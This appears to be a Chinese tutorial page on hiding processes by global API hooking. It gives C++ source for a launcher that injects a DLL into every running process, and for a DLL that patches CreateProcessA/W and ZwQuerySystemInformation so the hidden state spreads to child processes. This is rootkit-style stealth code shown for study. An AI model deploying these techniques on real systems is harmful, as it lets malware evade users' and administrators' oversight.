第33章:隱藏程序-API程式碼修改技術(中)
阿新 • • 發佈:2020-08-06
全域性鉤取 API :
①Kernel32.CreateProcess() ,可以用來建立新程序,其它啟動執行程序的 API ( WinExec() , ShellExecute() , system() ) 在其內部也是呼叫此 API .
explorer.exe是 Windows 程式管理器或者檔案資源管理器,它用於管理 Windows 圖形殼,
包括桌面和檔案管理,刪除該程式會導致 Windows 圖形介面無法使用.
需要注意的是,這種尚未公開的 API 如果後期系統更新時發生了改變,就可能導致其無法生效.
此種方法也有問題,即無法對現在已經執行的程序進行隱藏,只能對未來的程序進行隱藏
HideProc2.cpp
int _tmain(int argc, TCHAR* argv[])
{
    // Exactly two arguments are expected: the mode switch and the DLL path.
    // Unlike the earlier HideProc version there is no process-name argument.
    if (argc != 3) {
        printf("\n Usage : HideProc2.exe <-hide|-show> <dll path>\n\n");
        return 1;
    }

    // "-show" selects ejection; anything else (normally "-hide") selects injection.
    // NOTE: L"-show" is a wide literal, so this comparison assumes a UNICODE build
    // (TCHAR == wchar_t); it would not compile as intended in an ANSI build.
    int nMode = (_tcsicmp(argv[1], L"-show") == 0) ? EJECTION_MODE : INJECTION_MODE;

    // Raise the debug privilege first; presumably required so InjectAllProcess
    // can open other processes. Its return value is not checked here.
    SetPrivilege(SE_DEBUG_NAME, TRUE);

    // Inject into (or eject from) every process currently running. Processes
    // started later are covered by the CreateProcess hooks in Stealth2.cpp.
    InjectAllProcess(nMode, argv[2]);
    return 0;
}
與前面的程式碼只有main()函式少了一點,其它的都一樣.
Stealth2.cpp
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    char szCurProc[MAX_PATH] = {0};
    const char *pszBaseName = NULL;

    // The DLL must never act inside the launcher itself: take the basename of
    // the host executable (text after the last backslash) and bail out early
    // if it is HideProc2.exe.
    GetModuleFileNameA(NULL, szCurProc, MAX_PATH);
    pszBaseName = strrchr(szCurProc, '\\');
    if (pszBaseName != NULL && _stricmp(pszBaseName + 1, "HideProc2.exe") == 0)
        return TRUE;

    // Privilege adjustment runs for every reason code, i.e. also on
    // DLL_THREAD_ATTACH / DLL_THREAD_DETACH, not just process attach/detach.
    SetPrivilege(SE_DEBUG_NAME, TRUE);

    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Compared with the earlier version, CreateProcessA/W are hooked in
        // addition to ZwQuerySystemInformation: the CreateProcess hooks let
        // child processes receive this DLL as well, while the ntdll hook is
        // presumably the process-list filter (NewZwQuerySystemInformation is
        // not shown on this page). hook_by_code patches the export's code in
        // place; the saved original bytes live in the g_pOrg* buffers.
        // Defensive note: in-place patches of kernel32/ntdll exports like these
        // are detectable by comparing the exported function prologues in memory
        // against the on-disk image.
        hook_by_code("kernel32.dll", "CreateProcessA", (PROC)NewCreateProcessA, g_pOrgCPA);
        hook_by_code("kernel32.dll", "CreateProcessW", (PROC)NewCreateProcessW, g_pOrgCPW);
        hook_by_code("ntdll.dll", "ZwQuerySystemInformation", (PROC)NewZwQuerySystemInformation, g_pOrgZwQSI);
    } else if (fdwReason == DLL_PROCESS_DETACH) {
        // Restore the original bytes in the same order they were patched.
        unhook_by_code("kernel32.dll", "CreateProcessA", g_pOrgCPA);
        unhook_by_code("kernel32.dll", "CreateProcessW", g_pOrgCPW);
        unhook_by_code("ntdll.dll", "ZwQuerySystemInformation", g_pOrgZwQSI);
    }

    return TRUE;
}
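/*
 * Replacement for kernel32!CreateProcessA installed by hook_by_code.
 *
 * Temporarily removes the in-place patch, calls the real export, injects
 * this DLL into the newly created child (CreateProcess returns the child's
 * process handle directly, so no extra OpenProcess is needed), then
 * re-installs the patch. Returns whatever the real CreateProcessA returned,
 * or FALSE if the export could not be resolved.
 *
 * Parameter types mirror the generic LPCTSTR/LPTSTR/LPSTARTUPINFO forms used
 * by the original listing rather than the ANSI-specific LPCSTR/LPSTR/
 * LPSTARTUPINFOA; they are only passed through, so the call is ABI-compatible.
 *
 * NOTE(review): the unhook -> call -> rehook sequence is not thread-safe.
 * Two threads calling CreateProcessA concurrently can interleave the
 * unhook/rehook writes, and a call arriving in the window sees the original,
 * unhooked function. Serialising this region (e.g. a critical section set up
 * in DllMain) is left as a follow-up because it needs shared state.
 */
BOOL WINAPI NewCreateProcessA(
    LPCTSTR lpApplicationName,
    LPTSTR lpCommandLine,
    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL bInheritHandles,
    DWORD dwCreationFlags,
    LPVOID lpEnvironment,
    LPCTSTR lpCurrentDirectory,
    LPSTARTUPINFO lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation)
{
    BOOL bRet = 0;
    FARPROC pFunc = NULL;

    // Put the original bytes back so the real export can be executed.
    unhook_by_code("kernel32.dll", "CreateProcessA", g_pOrgCPA);

    // Resolve the real entry point. The original listing did not check this
    // result; a NULL here would have been called through and crashed the host
    // process, so fail the call instead (the hook is still re-installed below).
    pFunc = GetProcAddress(GetModuleHandleA("kernel32.dll"), "CreateProcessA");
    if (pFunc != NULL) {
        bRet = ((PFCREATEPROCESSA)pFunc)(lpApplicationName, lpCommandLine,
                                         lpProcessAttributes, lpThreadAttributes,
                                         bInheritHandles, dwCreationFlags,
                                         lpEnvironment, lpCurrentDirectory,
                                         lpStartupInfo, lpProcessInformation);

        // On success, inject Stealth2 into the child using the handle that
        // CreateProcess just filled in. (CreateProcess requires a non-NULL
        // lpProcessInformation, so bRet != 0 implies it is valid.)
        if (bRet)
            InjectDll2(lpProcessInformation->hProcess, STR_MODULE_NAME);
    }

    // Re-apply the patch so the next CreateProcessA call is intercepted again.
    hook_by_code("kernel32.dll", "CreateProcessA", (PROC)NewCreateProcessA, g_pOrgCPA);
    return bRet;
}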